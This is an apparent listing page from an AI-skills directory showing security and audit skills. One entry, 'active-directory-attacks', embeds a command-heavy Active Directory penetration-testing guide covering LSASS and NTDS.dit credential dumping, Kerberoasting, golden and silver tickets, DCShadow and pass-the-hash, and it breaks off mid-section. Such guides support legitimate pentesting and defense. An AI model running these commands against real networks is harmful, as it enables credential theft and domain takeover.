灵感菇

A natural ecosystem of AI skills: one sentence from you spreads into unlimited connections.

Search results

Found 226 related results / Command-line tools

Security & Governance / Audit & Assessment

isms-audit-expert

309

Senior ISMS Audit Expert for internal and external information security management system auditing. Provides ISO 27001 audit expertise, security audit program…

Stars 27,322
design, security, audit, isms

Security & Governance / Audit & Assessment

lint-and-validate

304

Automatic quality control, linting, and static analysis procedures. Use after every code modification to ensure syntax correctness and project standards.…

Stars 27,325
security, audit, lint, and

Security & Governance / Audit & Assessment

firebase-storage

302

Build with Firebase Cloud Storage - file uploads, downloads, and secure access. Use when: uploading images/files, generating download URLs, implementing file pickers, setting up storage security rules, or troubleshooting storage/unauthorized, cors errors, quota exceeded, or upload failed errors. Prevents 9 documented errors.

Stars 783
ui, security, auth, rag

Security & Governance / Audit & Assessment

Active Directory Attacks

active-directory-attacks

300

Active Directory Penetration Testing Technical Guide

## Information Gathering

### Basic Domain Information

- `nltest /domain_trusts` - view domain trust relationships
- `net view /domain` - enumerate the domain list
- `nslookup -type=SRV _ldap._tcp.dc._msdcs.<domain>` - locate domain controllers

### BloodHound Asset Discovery

```powershell
# SharpHound data collection
Invoke-BloodHound -CollectionMethod All -Domain target.com -ZipFileName loot.zip
```

### LDAP Queries

```powershell
# Find domain admin accounts
([adsisearcher]"(&(objectCategory=person)(objectClass=user)(adminCount=1))").FindAll()
# Find service accounts with unconstrained delegation
Get-ADObject -LDAPFilter "(&(userAccountControl:1.2.840.113556.1.4.803:=524288)(samAccountType=805306368))"
```

## Credential Acquisition

### LSASS Memory Extraction

```powershell
# procdump + mimikatz offline parsing
procdump.exe -accepteula -ma lsass.exe lsass.dmp
sekurlsa::minidump lsass.dmp
sekurlsa::logonPasswords full
```

### SAM/NTDS.dit Extraction

```powershell
# Volume Shadow Copy method
vssadmin create shadow /for=C:
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\loot\
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\loot\
# ntdsutil official tool
ntdsutil "ac i ntds" "ifm" "create full c:\loot" q q
```

### Kerberoasting

```powershell
# Request SPN service tickets
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/sql01.target.com:1433"
# Rubeus automation
Rubeus.exe kerberoast /outfile:hashes.txt
```

## Kerberos Attacks

### AS-REP Roasting

```powershell
# Find accounts with "Do not require Kerberos preauthentication"
Get-ADUser -Filter {DoesNotRequirePreAuth -eq $true} -Properties DoesNotRequirePreAuth
# Rubeus attack
Rubeus.exe asreproast /format:hashcat /outfile:asrep.txt
```

### Golden Ticket

```powershell
# Requires the NTLM hash of the krbtgt account
mimikatz # lsadump::dcsync /domain:target.com /user:krbtgt
mimikatz # kerberos::golden /user:Administrator /domain:target.com /sid:S-1-5-21-... /krbtgt:hash /ptt
```

### Silver Ticket

```powershell
# Targets a specific service; requires the service account's NTLM hash
mimikatz # kerberos::golden /user:fakeuser /domain:target.com /sid:S-1-5-21-... /target:sql01.target.com /service:MSSQLSvc /rc4:servicehash /ptt
```

### DCShadow

```powershell
# Requires domain admin privileges; registers a rogue DC
mimikatz # lsadump::dcshadow /object:targetuser /attribute:Description /value:"backdoor"
```

## Lateral Movement

### Pass-the-Hash

```powershell
# mimikatz
sekurlsa::pth /user:admin /domain:target.com /ntlm:hash /run:powershell.exe
# Invoke-WMIExec
Invoke-WMIExec -Target dc01.target.com -Username admin -Hash hash -Command "powershell -enc ..."
```

### Over-Pass-the-Hash

```powershell
# After obtaining a TGT, use normal Kerberos authentication
Rubeus.exe asktgt /user:admin /rc4:hash /ptt
```

### Pass-the-Ticket

```powershell
# Export tickets, then inject them
mimikatz # sekurlsa::tickets /export
mimikatz # kerberos::ptt [0;123456]-0-0-40810000-admin@krbtgt-target.com.kirbi
```

### Constrained Delegation Abuse

```powershell
# Configure S4U2Self + S4U2Proxy
Rubeus.exe s4u /user:svc_account /rc4:hash /impersonateuser:admin /msdsspn:cifs/target.target.com /ptt
```

### Resource-Based Constrained Delegation (RBCD

Stars 0
ui, ux, testing, security

Security & Governance / Audit & Assessment

roier-seo

299

Technical SEO auditor and fixer. Runs Lighthouse/PageSpeed audits on websites or local dev servers, analyzes SEO/performance/accessibility scores, and…

Stars 27,327
performance, audit, roier, seo

Security & Governance / Audit & Assessment

alicloud-network-dns-cli-test

292

Minimal smoke test for the Alibaba Cloud DNS CLI skill. Verifies aliyun-cli authentication and the describe-subdomain flow.

Stars 0
ui, auth, alicloud, network

Security & Governance / Audit & Assessment

security-scanning-security-dependencies

292

You are a security expert specializing in dependency vulnerability analysis, SBOM generation, and supply chain security. Scan project dependencies across…

Stars 37,704
testing, security, audit, database

Security & Governance / Audit & Assessment

getnote-auth

288

Manage authentication for Get笔记 CLI

Stars 74
auth, api, getnote, manage

Security & Governance / Audit & Assessment

load-issues

287

Load all open issues from GitHub and save them as markdown files

Stars 999
auth, sql, github, load

Security & Governance / Audit & Assessment

getnote-search

287

Semantic search across notes in Get笔记 via the getnote CLI

Stars 74
ui, auth, getnote, search

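Security & Governance / Audit & Assessment

feishu-cli-vc

284

Feishu video conferencing and Feishu Minutes operations. Multi-dimensional search of past meetings; retrieval of meeting notes, AI artifacts and verbatim transcripts; querying meeting recordings; downloading Feishu Minutes media files. Supports three entry paths: meeting-ids / minute-tokens / calendar-event-ids. Use when the user requests "search meetings", "meeting records", "meeting notes", "verbatim transcript", "Feishu Minutes", "meeting", "vc search", "vc recording", "minutes", "download Feishu Minutes", "Feishu Minutes video", "meeting recording", or "find a meeting from the calendar".

Stars 974
auth, feishu, cli, meeting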

Security & Governance / Audit & Assessment

decay

282

Manage evidence freshness by identifying stale decisions and providing governance actions

Stars 999
ui, performance, security, audit

Security & Governance / Audit & Assessment

qms-audit-expert

281

Senior QMS Audit Expert for internal and external quality management system auditing. Provides ISO 13485 audit expertise, audit program management,…

Stars 27,327
design, audit, qms, expert

Security & Governance / Audit & Assessment

find-bugs

281

Find bugs, security vulnerabilities, and code quality issues in local branch changes. Use when asked to review changes, find bugs, security review, or audit…

Stars 37,682
security, audit, find, bugs

Security & Governance / Audit & Assessment

query

278

Search the FPF knowledge base and display hypothesis details with assurance information

Stars 999
audit, query, search, the

Security & Governance / Audit & Assessment

security-compliance-compliance-check

273

You are a compliance expert specializing in regulatory requirements for software systems including GDPR, HIPAA, SOC2, PCI-DSS, and other industry standards.…

Stars 37,704
design, ui, security, audit

Security & Governance / Audit & Assessment

getnote-tag

266

Manage note tags in Get笔记 via the getnote CLI

Stars 74
ui, auth, getnote, tag

Security & Governance / Audit & Assessment

getnote-kb

265

Manage knowledge bases in Get笔记 via the getnote CLI

Stars 74
ui, auth, getnote, manage

Security & Governance / Audit & Assessment

attack-tree-construction

256

Build comprehensive attack trees to visualize threat paths. Use when mapping attack scenarios, identifying defense gaps, or communicating security risks to…

Stars 37,666
design, ui, security, auth

Security & Governance / Audit & Assessment

dependency-management-deps-audit

253

You are a dependency security expert specializing in vulnerability scanning, license compliance, and supply chain security. Analyze project dependencies for…

Stars 37,676
security, audit, dependency, management
